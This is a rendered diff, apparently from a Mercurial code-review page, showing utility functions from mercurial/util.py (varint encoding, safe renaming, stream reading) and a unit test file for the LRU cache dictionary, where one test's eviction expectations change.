3848 class docobject(object):
3858 class docobject(object):
3849 pass
3859 pass
3850
3860
3851 for name in compengines:
3861 for name in compengines:
3852 engine = compengines[name]
3862 engine = compengines[name]
3853
3863
3854 if not engine.available():
3864 if not engine.available():
3855 continue
3865 continue
3856
3866
3857 bt = engine.bundletype()
3867 bt = engine.bundletype()
3858 if not bt or not bt[0]:
3868 if not bt or not bt[0]:
3859 continue
3869 continue
3860
3870
3861 doc = pycompat.sysstr('``%s``\n %s') % (
3871 doc = pycompat.sysstr('``%s``\n %s') % (
3862 bt[0], engine.bundletype.__doc__)
3872 bt[0], engine.bundletype.__doc__)
3863
3873
3864 value = docobject()
3874 value = docobject()
3865 value.__doc__ = doc
3875 value.__doc__ = doc
3866 value._origdoc = engine.bundletype.__doc__
3876 value._origdoc = engine.bundletype.__doc__
3867 value._origfunc = engine.bundletype
3877 value._origfunc = engine.bundletype
3868
3878
3869 items[bt[0]] = value
3879 items[bt[0]] = value
3870
3880
3871 return items
3881 return items
3872
3882
3873 i18nfunctions = bundlecompressiontopics().values()
3883 i18nfunctions = bundlecompressiontopics().values()
3874
3884
3875 # convenient shortcut
3885 # convenient shortcut
3876 dst = debugstacktrace
3886 dst = debugstacktrace
3877
3887
3878 def safename(f, tag, ctx, others=None):
3888 def safename(f, tag, ctx, others=None):
3879 """
3889 """
3880 Generate a name that it is safe to rename f to in the given context.
3890 Generate a name that it is safe to rename f to in the given context.
3881
3891
3882 f: filename to rename
3892 f: filename to rename
3883 tag: a string tag that will be included in the new name
3893 tag: a string tag that will be included in the new name
3884 ctx: a context, in which the new name must not exist
3894 ctx: a context, in which the new name must not exist
3885 others: a set of other filenames that the new name must not be in
3895 others: a set of other filenames that the new name must not be in
3886
3896
3887 Returns a file name of the form oldname~tag[~number] which does not exist
3897 Returns a file name of the form oldname~tag[~number] which does not exist
3888 in the provided context and is not in the set of other names.
3898 in the provided context and is not in the set of other names.
3889 """
3899 """
3890 if others is None:
3900 if others is None:
3891 others = set()
3901 others = set()
3892
3902
3893 fn = '%s~%s' % (f, tag)
3903 fn = '%s~%s' % (f, tag)
3894 if fn not in ctx and fn not in others:
3904 if fn not in ctx and fn not in others:
3895 return fn
3905 return fn
3896 for n in itertools.count(1):
3906 for n in itertools.count(1):
3897 fn = '%s~%s~%s' % (f, tag, n)
3907 fn = '%s~%s~%s' % (f, tag, n)
3898 if fn not in ctx and fn not in others:
3908 if fn not in ctx and fn not in others:
3899 return fn
3909 return fn
3900
3910
3901 def readexactly(stream, n):
3911 def readexactly(stream, n):
3902 '''read n bytes from stream.read and abort if less was available'''
3912 '''read n bytes from stream.read and abort if less was available'''
3903 s = stream.read(n)
3913 s = stream.read(n)
3904 if len(s) < n:
3914 if len(s) < n:
3905 raise error.Abort(_("stream ended unexpectedly"
3915 raise error.Abort(_("stream ended unexpectedly"
3906 " (got %d bytes, expected %d)")
3916 " (got %d bytes, expected %d)")
3907 % (len(s), n))
3917 % (len(s), n))
3908 return s
3918 return s
3909
3919
3910 def uvarintencode(value):
3920 def uvarintencode(value):
3911 """Encode an unsigned integer value to a varint.
3921 """Encode an unsigned integer value to a varint.
3912
3922
3913 A varint is a variable length integer of 1 or more bytes. Each byte
3923 A varint is a variable length integer of 1 or more bytes. Each byte
3914 except the last has the most significant bit set. The lower 7 bits of
3924 except the last has the most significant bit set. The lower 7 bits of
3915 each byte store the 2's complement representation, least significant group
3925 each byte store the 2's complement representation, least significant group
3916 first.
3926 first.
3917
3927
3918 >>> uvarintencode(0)
3928 >>> uvarintencode(0)
3919 '\\x00'
3929 '\\x00'
3920 >>> uvarintencode(1)
3930 >>> uvarintencode(1)
3921 '\\x01'
3931 '\\x01'
3922 >>> uvarintencode(127)
3932 >>> uvarintencode(127)
3923 '\\x7f'
3933 '\\x7f'
3924 >>> uvarintencode(1337)
3934 >>> uvarintencode(1337)
3925 '\\xb9\\n'
3935 '\\xb9\\n'
3926 >>> uvarintencode(65536)
3936 >>> uvarintencode(65536)
3927 '\\x80\\x80\\x04'
3937 '\\x80\\x80\\x04'
3928 >>> uvarintencode(-1)
3938 >>> uvarintencode(-1)
3929 Traceback (most recent call last):
3939 Traceback (most recent call last):
3930 ...
3940 ...
3931 ProgrammingError: negative value for uvarint: -1
3941 ProgrammingError: negative value for uvarint: -1
3932 """
3942 """
3933 if value < 0:
3943 if value < 0:
3934 raise error.ProgrammingError('negative value for uvarint: %d'
3944 raise error.ProgrammingError('negative value for uvarint: %d'
3935 % value)
3945 % value)
3936 bits = value & 0x7f
3946 bits = value & 0x7f
3937 value >>= 7
3947 value >>= 7
3938 bytes = []
3948 bytes = []
3939 while value:
3949 while value:
3940 bytes.append(pycompat.bytechr(0x80 | bits))
3950 bytes.append(pycompat.bytechr(0x80 | bits))
3941 bits = value & 0x7f
3951 bits = value & 0x7f
3942 value >>= 7
3952 value >>= 7
3943 bytes.append(pycompat.bytechr(bits))
3953 bytes.append(pycompat.bytechr(bits))
3944
3954
3945 return ''.join(bytes)
3955 return ''.join(bytes)
3946
3956
3947 def uvarintdecodestream(fh):
3957 def uvarintdecodestream(fh):
3948 """Decode an unsigned variable length integer from a stream.
3958 """Decode an unsigned variable length integer from a stream.
3949
3959
3950 The passed argument is anything that has a ``.read(N)`` method.
3960 The passed argument is anything that has a ``.read(N)`` method.
3951
3961
3952 >>> try:
3962 >>> try:
3953 ... from StringIO import StringIO as BytesIO
3963 ... from StringIO import StringIO as BytesIO
3954 ... except ImportError:
3964 ... except ImportError:
3955 ... from io import BytesIO
3965 ... from io import BytesIO
3956 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3966 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3957 0
3967 0
3958 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3968 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3959 1
3969 1
3960 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3970 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3961 127
3971 127
3962 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3972 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3963 1337
3973 1337
3964 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3974 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3965 65536
3975 65536
3966 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3976 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3967 Traceback (most recent call last):
3977 Traceback (most recent call last):
3968 ...
3978 ...
3969 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3979 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3970 """
3980 """
3971 result = 0
3981 result = 0
3972 shift = 0
3982 shift = 0
3973 while True:
3983 while True:
3974 byte = ord(readexactly(fh, 1))
3984 byte = ord(readexactly(fh, 1))
3975 result |= ((byte & 0x7f) << shift)
3985 result |= ((byte & 0x7f) << shift)
3976 if not (byte & 0x80):
3986 if not (byte & 0x80):
3977 return result
3987 return result
3978 shift += 7
3988 shift += 7
@@ -1,325 +1,325 b''
1 from __future__ import absolute_import, print_function
1 from __future__ import absolute_import, print_function
2
2
3 import unittest
3 import unittest
4
4
5 import silenttestrunner
5 import silenttestrunner
6
6
7 from mercurial import (
7 from mercurial import (
8 util,
8 util,
9 )
9 )
10
10
11 class testlrucachedict(unittest.TestCase):
11 class testlrucachedict(unittest.TestCase):
12 def testsimple(self):
12 def testsimple(self):
13 d = util.lrucachedict(4)
13 d = util.lrucachedict(4)
14 self.assertEqual(d.capacity, 4)
14 self.assertEqual(d.capacity, 4)
15 d.insert('a', 'va', cost=2)
15 d.insert('a', 'va', cost=2)
16 d['b'] = 'vb'
16 d['b'] = 'vb'
17 d['c'] = 'vc'
17 d['c'] = 'vc'
18 d.insert('d', 'vd', cost=42)
18 d.insert('d', 'vd', cost=42)
19
19
20 self.assertEqual(d['a'], 'va')
20 self.assertEqual(d['a'], 'va')
21 self.assertEqual(d['b'], 'vb')
21 self.assertEqual(d['b'], 'vb')
22 self.assertEqual(d['c'], 'vc')
22 self.assertEqual(d['c'], 'vc')
23 self.assertEqual(d['d'], 'vd')
23 self.assertEqual(d['d'], 'vd')
24
24
25 self.assertEqual(d.totalcost, 44)
25 self.assertEqual(d.totalcost, 44)
26
26
27 # 'a' should be dropped because it was least recently used.
27 # 'a' should be dropped because it was least recently used.
28 d['e'] = 've'
28 d['e'] = 've'
29 self.assertNotIn('a', d)
29 self.assertNotIn('a', d)
30 self.assertIsNone(d.get('a'))
30 self.assertIsNone(d.get('a'))
31 self.assertEqual(d.totalcost, 42)
31 self.assertEqual(d.totalcost, 42)
32
32
33 self.assertEqual(d['b'], 'vb')
33 self.assertEqual(d['b'], 'vb')
34 self.assertEqual(d['c'], 'vc')
34 self.assertEqual(d['c'], 'vc')
35 self.assertEqual(d['d'], 'vd')
35 self.assertEqual(d['d'], 'vd')
36 self.assertEqual(d['e'], 've')
36 self.assertEqual(d['e'], 've')
37
37
38 # Replacing item with different cost adjusts totalcost.
38 # Replacing item with different cost adjusts totalcost.
39 d.insert('e', 've', cost=4)
39 d.insert('e', 've', cost=4)
40 self.assertEqual(d.totalcost, 46)
40 self.assertEqual(d.totalcost, 46)
41
41
42 # Touch entries in some order (both get and set).
42 # Touch entries in some order (both get and set).
43 d['e']
43 d['e']
44 d['c'] = 'vc2'
44 d['c'] = 'vc2'
45 d['d']
45 d['d']
46 d['b'] = 'vb2'
46 d['b'] = 'vb2'
47
47
48 # 'e' should be dropped now
48 # 'e' should be dropped now
49 d['f'] = 'vf'
49 d['f'] = 'vf'
50 self.assertNotIn('e', d)
50 self.assertNotIn('e', d)
51 self.assertEqual(d['b'], 'vb2')
51 self.assertEqual(d['b'], 'vb2')
52 self.assertEqual(d['c'], 'vc2')
52 self.assertEqual(d['c'], 'vc2')
53 self.assertEqual(d['d'], 'vd')
53 self.assertEqual(d['d'], 'vd')
54 self.assertEqual(d['f'], 'vf')
54 self.assertEqual(d['f'], 'vf')
55
55
56 d.clear()
56 d.clear()
57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 self.assertNotIn(key, d)
58 self.assertNotIn(key, d)
59
59
60 def testunfull(self):
60 def testunfull(self):
61 d = util.lrucachedict(4)
61 d = util.lrucachedict(4)
62 d['a'] = 1
62 d['a'] = 1
63 d['b'] = 2
63 d['b'] = 2
64 d['a']
64 d['a']
65 d['b']
65 d['b']
66
66
67 for key in ('a', 'b'):
67 for key in ('a', 'b'):
68 self.assertIn(key, d)
68 self.assertIn(key, d)
69
69
70 def testcopypartial(self):
70 def testcopypartial(self):
71 d = util.lrucachedict(4)
71 d = util.lrucachedict(4)
72 d.insert('a', 'va', cost=4)
72 d.insert('a', 'va', cost=4)
73 d.insert('b', 'vb', cost=2)
73 d.insert('b', 'vb', cost=2)
74
74
75 dc = d.copy()
75 dc = d.copy()
76
76
77 self.assertEqual(len(dc), 2)
77 self.assertEqual(len(dc), 2)
78 self.assertEqual(dc.totalcost, 6)
78 self.assertEqual(dc.totalcost, 6)
79 for key in ('a', 'b'):
79 for key in ('a', 'b'):
80 self.assertIn(key, dc)
80 self.assertIn(key, dc)
81 self.assertEqual(dc[key], 'v%s' % key)
81 self.assertEqual(dc[key], 'v%s' % key)
82
82
83 self.assertEqual(len(d), 2)
83 self.assertEqual(len(d), 2)
84 for key in ('a', 'b'):
84 for key in ('a', 'b'):
85 self.assertIn(key, d)
85 self.assertIn(key, d)
86 self.assertEqual(d[key], 'v%s' % key)
86 self.assertEqual(d[key], 'v%s' % key)
87
87
88 d['c'] = 'vc'
88 d['c'] = 'vc'
89 del d['b']
89 del d['b']
90 self.assertEqual(d.totalcost, 4)
90 self.assertEqual(d.totalcost, 4)
91 dc = d.copy()
91 dc = d.copy()
92 self.assertEqual(len(dc), 2)
92 self.assertEqual(len(dc), 2)
93 self.assertEqual(dc.totalcost, 4)
93 self.assertEqual(dc.totalcost, 4)
94 for key in ('a', 'c'):
94 for key in ('a', 'c'):
95 self.assertIn(key, dc)
95 self.assertIn(key, dc)
96 self.assertEqual(dc[key], 'v%s' % key)
96 self.assertEqual(dc[key], 'v%s' % key)
97
97
98 def testcopyempty(self):
98 def testcopyempty(self):
99 d = util.lrucachedict(4)
99 d = util.lrucachedict(4)
100 dc = d.copy()
100 dc = d.copy()
101 self.assertEqual(len(dc), 0)
101 self.assertEqual(len(dc), 0)
102
102
103 def testcopyfull(self):
103 def testcopyfull(self):
104 d = util.lrucachedict(4)
104 d = util.lrucachedict(4)
105 d.insert('a', 'va', cost=42)
105 d.insert('a', 'va', cost=42)
106 d['b'] = 'vb'
106 d['b'] = 'vb'
107 d['c'] = 'vc'
107 d['c'] = 'vc'
108 d['d'] = 'vd'
108 d['d'] = 'vd'
109
109
110 dc = d.copy()
110 dc = d.copy()
111
111
112 for key in ('a', 'b', 'c', 'd'):
112 for key in ('a', 'b', 'c', 'd'):
113 self.assertIn(key, dc)
113 self.assertIn(key, dc)
114 self.assertEqual(dc[key], 'v%s' % key)
114 self.assertEqual(dc[key], 'v%s' % key)
115
115
116 self.assertEqual(d.totalcost, 42)
116 self.assertEqual(d.totalcost, 42)
117 self.assertEqual(dc.totalcost, 42)
117 self.assertEqual(dc.totalcost, 42)
118
118
119 # 'a' should be dropped because it was least recently used.
119 # 'a' should be dropped because it was least recently used.
120 dc['e'] = 've'
120 dc['e'] = 've'
121 self.assertNotIn('a', dc)
121 self.assertNotIn('a', dc)
122 for key in ('b', 'c', 'd', 'e'):
122 for key in ('b', 'c', 'd', 'e'):
123 self.assertIn(key, dc)
123 self.assertIn(key, dc)
124 self.assertEqual(dc[key], 'v%s' % key)
124 self.assertEqual(dc[key], 'v%s' % key)
125
125
126 self.assertEqual(d.totalcost, 42)
126 self.assertEqual(d.totalcost, 42)
127 self.assertEqual(dc.totalcost, 0)
127 self.assertEqual(dc.totalcost, 0)
128
128
129 # Contents and order of original dict should remain unchanged.
129 # Contents and order of original dict should remain unchanged.
130 dc['b'] = 'vb_new'
130 dc['b'] = 'vb_new'
131
131
132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 for key in ('a', 'b', 'c', 'd'):
133 for key in ('a', 'b', 'c', 'd'):
134 self.assertEqual(d[key], 'v%s' % key)
134 self.assertEqual(d[key], 'v%s' % key)
135
135
136 d = util.lrucachedict(4, maxcost=42)
136 d = util.lrucachedict(4, maxcost=42)
137 d.insert('a', 'va', cost=5)
137 d.insert('a', 'va', cost=5)
138 d.insert('b', 'vb', cost=4)
138 d.insert('b', 'vb', cost=4)
139 d.insert('c', 'vc', cost=3)
139 d.insert('c', 'vc', cost=3)
140 dc = d.copy()
140 dc = d.copy()
141 self.assertEqual(dc.maxcost, 42)
141 self.assertEqual(dc.maxcost, 42)
142 self.assertEqual(len(dc), 3)
142 self.assertEqual(len(dc), 3)
143
143
144 # Max cost can be lowered as part of copy.
144 # Max cost can be lowered as part of copy.
145 dc = d.copy(maxcost=10)
145 dc = d.copy(maxcost=10)
146 self.assertEqual(dc.maxcost, 10)
146 self.assertEqual(dc.maxcost, 10)
147 self.assertEqual(len(dc), 2)
147 self.assertEqual(len(dc), 2)
148 self.assertEqual(dc.totalcost, 7)
148 self.assertEqual(dc.totalcost, 7)
149 self.assertIn('b', dc)
149 self.assertIn('b', dc)
150 self.assertIn('c', dc)
150 self.assertIn('c', dc)
151
151
152 def testcopydecreasecapacity(self):
152 def testcopydecreasecapacity(self):
153 d = util.lrucachedict(5)
153 d = util.lrucachedict(5)
154 d.insert('a', 'va', cost=4)
154 d.insert('a', 'va', cost=4)
155 d.insert('b', 'vb', cost=2)
155 d.insert('b', 'vb', cost=2)
156 d['c'] = 'vc'
156 d['c'] = 'vc'
157 d['d'] = 'vd'
157 d['d'] = 'vd'
158
158
159 dc = d.copy(2)
159 dc = d.copy(2)
160 self.assertEqual(dc.totalcost, 0)
160 self.assertEqual(dc.totalcost, 0)
161 for key in ('a', 'b'):
161 for key in ('a', 'b'):
162 self.assertNotIn(key, dc)
162 self.assertNotIn(key, dc)
163 for key in ('c', 'd'):
163 for key in ('c', 'd'):
164 self.assertIn(key, dc)
164 self.assertIn(key, dc)
165 self.assertEqual(dc[key], 'v%s' % key)
165 self.assertEqual(dc[key], 'v%s' % key)
166
166
167 dc.insert('e', 've', cost=7)
167 dc.insert('e', 've', cost=7)
168 self.assertEqual(dc.totalcost, 7)
168 self.assertEqual(dc.totalcost, 7)
169 self.assertNotIn('c', dc)
169 self.assertNotIn('c', dc)
170 for key in ('d', 'e'):
170 for key in ('d', 'e'):
171 self.assertIn(key, dc)
171 self.assertIn(key, dc)
172 self.assertEqual(dc[key], 'v%s' % key)
172 self.assertEqual(dc[key], 'v%s' % key)
173
173
174 # Original should remain unchanged.
174 # Original should remain unchanged.
175 self.assertEqual(d.totalcost, 6)
175 self.assertEqual(d.totalcost, 6)
176 for key in ('a', 'b', 'c', 'd'):
176 for key in ('a', 'b', 'c', 'd'):
177 self.assertIn(key, d)
177 self.assertIn(key, d)
178 self.assertEqual(d[key], 'v%s' % key)
178 self.assertEqual(d[key], 'v%s' % key)
179
179
180 def testcopyincreasecapacity(self):
180 def testcopyincreasecapacity(self):
181 d = util.lrucachedict(5)
181 d = util.lrucachedict(5)
182 d['a'] = 'va'
182 d['a'] = 'va'
183 d['b'] = 'vb'
183 d['b'] = 'vb'
184 d['c'] = 'vc'
184 d['c'] = 'vc'
185 d['d'] = 'vd'
185 d['d'] = 'vd'
186
186
187 dc = d.copy(6)
187 dc = d.copy(6)
188 for key in ('a', 'b', 'c', 'd'):
188 for key in ('a', 'b', 'c', 'd'):
189 self.assertIn(key, dc)
189 self.assertIn(key, dc)
190 self.assertEqual(dc[key], 'v%s' % key)
190 self.assertEqual(dc[key], 'v%s' % key)
191
191
192 dc['e'] = 've'
192 dc['e'] = 've'
193 dc['f'] = 'vf'
193 dc['f'] = 'vf'
194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
195 self.assertIn(key, dc)
195 self.assertIn(key, dc)
196 self.assertEqual(dc[key], 'v%s' % key)
196 self.assertEqual(dc[key], 'v%s' % key)
197
197
198 dc['g'] = 'vg'
198 dc['g'] = 'vg'
199 self.assertNotIn('a', dc)
199 self.assertNotIn('a', dc)
200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
201 self.assertIn(key, dc)
201 self.assertIn(key, dc)
202 self.assertEqual(dc[key], 'v%s' % key)
202 self.assertEqual(dc[key], 'v%s' % key)
203
203
204 # Original should remain unchanged.
204 # Original should remain unchanged.
205 for key in ('a', 'b', 'c', 'd'):
205 for key in ('a', 'b', 'c', 'd'):
206 self.assertIn(key, d)
206 self.assertIn(key, d)
207 self.assertEqual(d[key], 'v%s' % key)
207 self.assertEqual(d[key], 'v%s' % key)
208
208
209 def testpopoldest(self):
209 def testpopoldest(self):
210 d = util.lrucachedict(4)
210 d = util.lrucachedict(4)
211 d.insert('a', 'va', cost=10)
211 d.insert('a', 'va', cost=10)
212 d.insert('b', 'vb', cost=5)
212 d.insert('b', 'vb', cost=5)
213
213
214 self.assertEqual(len(d), 2)
214 self.assertEqual(len(d), 2)
215 self.assertEqual(d.popoldest(), ('a', 'va'))
215 self.assertEqual(d.popoldest(), ('a', 'va'))
216 self.assertEqual(len(d), 1)
216 self.assertEqual(len(d), 1)
217 self.assertEqual(d.totalcost, 5)
217 self.assertEqual(d.totalcost, 5)
218 self.assertEqual(d.popoldest(), ('b', 'vb'))
218 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 self.assertEqual(len(d), 0)
219 self.assertEqual(len(d), 0)
220 self.assertEqual(d.totalcost, 0)
220 self.assertEqual(d.totalcost, 0)
221 self.assertIsNone(d.popoldest())
221 self.assertIsNone(d.popoldest())
222
222
223 d['a'] = 'va'
223 d['a'] = 'va'
224 d['b'] = 'vb'
224 d['b'] = 'vb'
225 d['c'] = 'vc'
225 d['c'] = 'vc'
226 d['d'] = 'vd'
226 d['d'] = 'vd'
227
227
228 self.assertEqual(d.popoldest(), ('a', 'va'))
228 self.assertEqual(d.popoldest(), ('a', 'va'))
229 self.assertEqual(len(d), 3)
229 self.assertEqual(len(d), 3)
230 for key in ('b', 'c', 'd'):
230 for key in ('b', 'c', 'd'):
231 self.assertEqual(d[key], 'v%s' % key)
231 self.assertEqual(d[key], 'v%s' % key)
232
232
233 d['a'] = 'va'
233 d['a'] = 'va'
234 self.assertEqual(d.popoldest(), ('b', 'vb'))
234 self.assertEqual(d.popoldest(), ('b', 'vb'))
235
235
236 def testmaxcost(self):
236 def testmaxcost(self):
237 # Item cost is zero by default.
237 # Item cost is zero by default.
238 d = util.lrucachedict(6, maxcost=10)
238 d = util.lrucachedict(6, maxcost=10)
239 d['a'] = 'va'
239 d['a'] = 'va'
240 d['b'] = 'vb'
240 d['b'] = 'vb'
241 d['c'] = 'vc'
241 d['c'] = 'vc'
242 d['d'] = 'vd'
242 d['d'] = 'vd'
243 self.assertEqual(len(d), 4)
243 self.assertEqual(len(d), 4)
244 self.assertEqual(d.totalcost, 0)
244 self.assertEqual(d.totalcost, 0)
245
245
246 d.clear()
246 d.clear()
247
247
248 # Insertion to exact cost threshold works without eviction.
248 # Insertion to exact cost threshold works without eviction.
249 d.insert('a', 'va', cost=6)
249 d.insert('a', 'va', cost=6)
250 d.insert('b', 'vb', cost=4)
250 d.insert('b', 'vb', cost=4)
251
251
252 self.assertEqual(len(d), 2)
252 self.assertEqual(len(d), 2)
253 self.assertEqual(d['a'], 'va')
253 self.assertEqual(d['a'], 'va')
254 self.assertEqual(d['b'], 'vb')
254 self.assertEqual(d['b'], 'vb')
255
255
256 # Inserting a new element with 0 cost works.
256 # Inserting a new element with 0 cost works.
257 d['c'] = 'vc'
257 d['c'] = 'vc'
258 self.assertEqual(len(d), 3)
258 self.assertEqual(len(d), 3)
259
259
260 # Inserting a new element with cost putting us above high
260 # Inserting a new element with cost putting us above high
261 # water mark evicts oldest single item.
261 # water mark evicts oldest single item.
262 d.insert('d', 'vd', cost=1)
262 d.insert('d', 'vd', cost=1)
263 self.assertEqual(len(d), 3)
263 self.assertEqual(len(d), 3)
264 self.assertEqual(d.totalcost, 5)
264 self.assertEqual(d.totalcost, 5)
265 self.assertNotIn('a', d)
265 self.assertNotIn('a', d)
266 for key in ('b', 'c', 'd'):
266 for key in ('b', 'c', 'd'):
267 self.assertEqual(d[key], 'v%s' % key)
267 self.assertEqual(d[key], 'v%s' % key)
268
268
269 # Inserting a new element with enough room for just itself
269 # Inserting a new element with enough room for just itself
270 # evicts all items before.
270 # evicts all items before.
271 d.insert('e', 've', cost=10)
271 d.insert('e', 've', cost=10)
272 self.assertEqual(len(d), 1)
272 self.assertEqual(len(d), 1)
273 self.assertEqual(d.totalcost, 10)
273 self.assertEqual(d.totalcost, 10)
274 self.assertIn('e', d)
274 self.assertIn('e', d)
275
275
276 # Inserting a new element with cost greater than threshold
276 # Inserting a new element with cost greater than threshold
277 # still retains that item.
277 # still retains that item.
278 d.insert('f', 'vf', cost=11)
278 d.insert('f', 'vf', cost=11)
279 self.assertEqual(len(d), 1)
279 self.assertEqual(len(d), 1)
280 self.assertEqual(d.totalcost, 11)
280 self.assertEqual(d.totalcost, 11)
281 self.assertIn('f', d)
281 self.assertIn('f', d)
282
282
283 # Inserting a new element will evict the last item since it is
283 # Inserting a new element will evict the last item since it is
284 # too large.
284 # too large.
285 d['g'] = 'vg'
285 d['g'] = 'vg'
286 self.assertEqual(len(d), 1)
286 self.assertEqual(len(d), 1)
287 self.assertEqual(d.totalcost, 0)
287 self.assertEqual(d.totalcost, 0)
288 self.assertIn('g', d)
288 self.assertIn('g', d)
289
289
290 d.clear()
290 d.clear()
291
291
292 d.insert('a', 'va', cost=7)
292 d.insert('a', 'va', cost=7)
293 d.insert('b', 'vb', cost=3)
293 d.insert('b', 'vb', cost=3)
294 self.assertEqual(len(d), 2)
294 self.assertEqual(len(d), 2)
295
295
296 # Replacing a value with smaller cost won't result in eviction.
296 # Replacing a value with smaller cost won't result in eviction.
297 d.insert('b', 'vb2', cost=2)
297 d.insert('b', 'vb2', cost=2)
298 self.assertEqual(len(d), 2)
298 self.assertEqual(len(d), 2)
299
299
300 # Replacing a value with a higher cost will evict when threshold
300 # Replacing a value with a higher cost will evict when threshold
301 # exceeded.
301 # exceeded.
302 d.insert('b', 'vb3', cost=4)
302 d.insert('b', 'vb3', cost=4)
303 self.assertEqual(len(d), 1)
303 self.assertEqual(len(d), 1)
304 self.assertNotIn('a', d)
304 self.assertNotIn('a', d)
305
305
306 def testmaxcostcomplex(self):
306 def testmaxcostcomplex(self):
307 d = util.lrucachedict(100, maxcost=100)
307 d = util.lrucachedict(100, maxcost=100)
308 d.insert('a', 'va', cost=9)
308 d.insert('a', 'va', cost=9)
309 d.insert('b', 'vb', cost=21)
309 d.insert('b', 'vb', cost=21)
310 d.insert('c', 'vc', cost=7)
310 d.insert('c', 'vc', cost=7)
311 d.insert('d', 'vc', cost=50)
311 d.insert('d', 'vc', cost=50)
312 self.assertEqual(d.totalcost, 87)
312 self.assertEqual(d.totalcost, 87)
313
313
314 # Inserting new element should free multiple elements so we hit
314 # Inserting new element should free multiple elements so we hit
315 # low water mark.
315 # low water mark.
316 d.insert('e', 'vd', cost=25)
316 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 3)
317 self.assertEqual(len(d), 2)
318 self.assertNotIn('a', d)
318 self.assertNotIn('a', d)
319 self.assertNotIn('b', d)
319 self.assertNotIn('b', d)
320 self.assertIn('c', d)
320 self.assertNotIn('c', d)
321 self.assertIn('d', d)
321 self.assertIn('d', d)
322 self.assertIn('e', d)
322 self.assertIn('e', d)
323
323
324 if __name__ == '__main__':
324 if __name__ == '__main__':
325 silenttestrunner.main(__name__)
325 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now